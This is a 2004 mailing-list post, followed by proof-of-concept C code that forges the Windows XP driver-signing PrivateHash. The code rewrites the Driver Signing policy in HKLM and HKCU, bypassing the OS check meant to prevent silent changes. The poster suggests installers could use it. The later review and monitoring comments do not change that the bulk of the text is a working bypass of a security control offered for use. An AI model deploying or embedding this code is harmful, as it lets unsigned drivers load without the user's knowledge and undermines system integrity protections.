On Wed, Nov 10, 2004 at 01:38 -0700, Blaine Fleming wrote:
>
> >...but then, I suppose that if you wanted to be evil, you could just
> >find the registry key that GUI setting twiddles, temporarily modify it
> >during the install process and put it back afterwards.
>
> MS made sure it wasn't quite that easy...
> http://support.microsoft.com/?kbid=298503
I felt challenged by the wording in that KB article.
I present you with the attached Proof of concept C Code which can turn
the "Driver Signing" Setting on or off at will. The usual caveats apply
(it works on my machine: XP with SP2). Perhaps someone wants to include
it in the TAP installer :-)
CU,
Sec
--
"The General who in a hundred battles is always victorious is not as
great as the one who achieves his objectives without fighting."
-- Sun Tzu
#include <windows.h>
#include <wincrypt.h>
#include <stdio.h>
#define HP_HASHVALUE HP_HASHVAL
/* This program turns the Driver signing Policy On/Off for Windows XP
* Written by Stefan `Sec` Zehl <sec@xxxxxx>, 15.11.2004
*
* Thanks to sysinternals.com for regmon and apispy
* to msdn.microsoft.com for windows reference
* to cygwin for their environment
*/
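/**
 * Report a failed API call and terminate the program.
 *
 * Prints the caller's message together with the value of GetLastError()
 * (in hex) on stdout, then exits with status 1. Does not return.
 *
 * @param s  Short description of the operation that failed.
 */
void MyHandleError(const char *s){
    /* Capture the error code first so no later call can overwrite it. */
    unsigned int err = (unsigned int)GetLastError();

    /* The original format ended in "\n.", which left a stray '.' at the
     * start of the next output line; the period now precedes the newline. */
    printf("Error: %s, number %x.\n", s, err);
    exit(1);
}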
//--------------------------------------------------------------------
/*
 * Proof-of-concept entry point: rewrites the Windows XP "Driver Signing"
 * policy byte together with the MD5 digest stored alongside it.
 *
 * Steps, as visible in the code below:
 *   1. Read the DWORD value "seed" from HKLM\System\WPA\PnP.
 *   2. MD5-hash the 4 bytes {0, onoff, 0, 0} followed by the seed bytes.
 *   3. Store the 16-byte digest as the value "PrivateHash" under
 *      HKLM\Software\Microsoft\Windows\CurrentVersion\Setup.
 *   4. Store the single byte onoff as the value "Policy" under
 *      Software\Microsoft\Driver Signing in both HKCU and HKLM.
 *
 * Monitoring note: the three values written in steps 3 and 4 are the
 * artefacts this program leaves behind, so registry auditing on them is the
 * natural place to detect this kind of change. Writing under HKLM
 * presumably needs administrative rights -- confirm for the target setup.
 *
 * NOTE(review): registry failures are only printed, never acted on, so the
 * program continues with an unset seed or key handle (see notes below).
 * Only the CryptoAPI calls abort via MyHandleError().
 */
int main(void){
HCRYPTPROV hCryptProv;
HCRYPTHASH hHash;
BYTE data[16]; // receives the 16-byte MD5 digest
DWORD len;
DWORD seed; // NOTE(review): no initializer; stays indeterminate if the query below fails
HKEY hkey; // NOTE(review): no initializer; see the if(hkey) checks below
BYTE onoff=0; // policy byte to write; which value means "on" vs. "off" is not shown here
char input[4];
int x;
// Step 1: read HKLM\System\WPA\PnP\seed
if(RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"System\\WPA\\PnP",
0,
KEY_READ,
&hkey
)==ERROR_SUCCESS){
printf("RegOpenKey sucess\n");
}else{
// NOTE(review): failure is reported but execution continues with hkey unset
printf("RegOpenKey failure\n");
};
len=sizeof(seed);
if(RegQueryValueEx(
hkey,
"seed",
NULL,
NULL,
(BYTE*)&seed,
&len
)==ERROR_SUCCESS){
printf("RegQueryValue sucess\n");
}else{
// NOTE(review): seed is still hashed and printed below even when this fails
printf("RegQueryValue failure\n");
};
// NOTE(review): after a failed open this tests whatever RegOpenKeyEx left in
// hkey, which this code never set itself
if(hkey)
RegCloseKey(hkey);
printf("Seed=%x\n",(unsigned int)seed);
printf("Hello, World\n"); // leftover debug output
// Step 2: acquire a CSP handle (default container, PROV_RSA_FULL) for hashing
if(CryptAcquireContext(
&hCryptProv,
NULL,
NULL,
PROV_RSA_FULL,
0))
{
printf("CryptAcquireContext complete. \n");
} else {
MyHandleError("Acquisition of context failed.");
}
//--------------------------------------------------------------------
// Create an MD5 hash object.
if(CryptCreateHash(
hCryptProv,
CALG_MD5,
0,
0,
&hHash))
{
printf("An empty hash object has been created. \n");
} else {
MyHandleError("Error during CryptBeginHash!\n");
}
//--------------------------------------------------------------------
// First hash input: four bytes with the policy byte at index 1.
input[0]=0;
input[1]=onoff; // the policy byte being hashed
input[2]=0;
input[3]=0;
// NOTE(review): input is char[4] while the second hash input and the registry
// data are passed as BYTE pointers; no cast is applied here
if(CryptHashData(
hHash,
input,
sizeof(input),
0))
{
printf("The data has been hashed. \n");
} else {
MyHandleError("Error during CPHashData!\n");
}
//--------------------------------------------------------------------
// Second hash input: the raw bytes of the seed read in step 1.
if(CryptHashData(
hHash,
(BYTE*)&seed,
sizeof(seed),
0))
{
printf("The data has been hashed. \n");
} else {
MyHandleError("Error during CPHashData!\n");
}
//--------------------------------------------------------------------
// Retrieve the finished digest into data; len passes the buffer size in.
len=sizeof(data);
if( CryptGetHashParam(
hHash,
HP_HASHVALUE,
data,
&len,
0))
{
printf("The hash has been retrieved. \n");
} else {
MyHandleError("Error during CPGetHashParam!\n");
}
//--------------------------------------------------------------------
// Clean up.
// Destroy the hash object.
if(hHash) {
if(!(CryptDestroyHash(hHash)))
MyHandleError("Error during CryptDestroyHash");
}
// Release the CSP.
if(hCryptProv) {
if(!(CryptReleaseContext(hCryptProv,0)))
MyHandleError("Error during CryptReleaseContext");
}
// Print the digest byte by byte; %x does not zero-pad, so a byte below 0x10
// prints as a single hex digit.
printf("Hash: ");
for(x=0;x<sizeof(data);x++){
printf("%x ",data[x]);
};
printf("\nCreate md5 hash completed without error. \n");
//--------------------------------------------------------------------
// Step 3: write HKLM\Software\Microsoft\Windows\CurrentVersion\Setup\PrivateHash
// (presumably the value the OS compares against Policy -- inferred from the
// accompanying email, not shown in this code)
if(RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Setup",
0,
KEY_WRITE,
&hkey
)==ERROR_SUCCESS){
printf("RegOpenKey sucess\n");
}else{
// NOTE(review): failure is reported but the write below is still attempted
printf("RegOpenKey failure\n");
};
len=sizeof(seed); // NOTE(review): len is not read again after this assignment
if(RegSetValueEx(
hkey,
"PrivateHash",
0,
REG_BINARY,
data,
sizeof(data)
)==ERROR_SUCCESS){
printf("RegSetValueEx sucess\n");
}else{
printf("RegSetValueEx failure\n");
};
if(hkey)
RegCloseKey(hkey);
//--------------------------------------------------------------------
// Step 4a: write HKCU\Software\Microsoft\Driver Signing\Policy
// (this open uses HKEY_CURRENT_USER; the HKLM copy is written in step 4b)
if(RegOpenKeyEx(
HKEY_CURRENT_USER,
"Software\\Microsoft\\Driver Signing",
0,
KEY_WRITE,
&hkey
)==ERROR_SUCCESS){
printf("RegOpenKey sucess\n");
}else{
printf("RegOpenKey failure\n");
};
len=sizeof(seed); // NOTE(review): len is not read again after this assignment
if(RegSetValueEx(
hkey,
"Policy",
0,
REG_BINARY,
&onoff,
1
)==ERROR_SUCCESS){
printf("RegSetValueEx sucess\n");
}else{
printf("RegSetValueEx failure\n");
};
if(hkey)
RegCloseKey(hkey);
//--------------------------------------------------------------------
// Step 4b: write HKLM\Software\Microsoft\Driver Signing\Policy
if(RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Driver Signing",
0,
KEY_WRITE,
&hkey
)==ERROR_SUCCESS){
printf("RegOpenKey sucess\n");
}else{
printf("RegOpenKey failure\n");
};
len=sizeof(seed); // NOTE(review): len is not read again after this assignment
if(RegSetValueEx(
hkey,
"Policy",
0,
REG_BINARY,
&onoff,
1
)==ERROR_SUCCESS){
printf("RegSetValueEx sucess\n");
}else{
printf("RegSetValueEx failure\n");
};
if(hkey)
RegCloseKey(hkey);
// Exits 0 even when the registry steps above reported failures.
exit(0);
}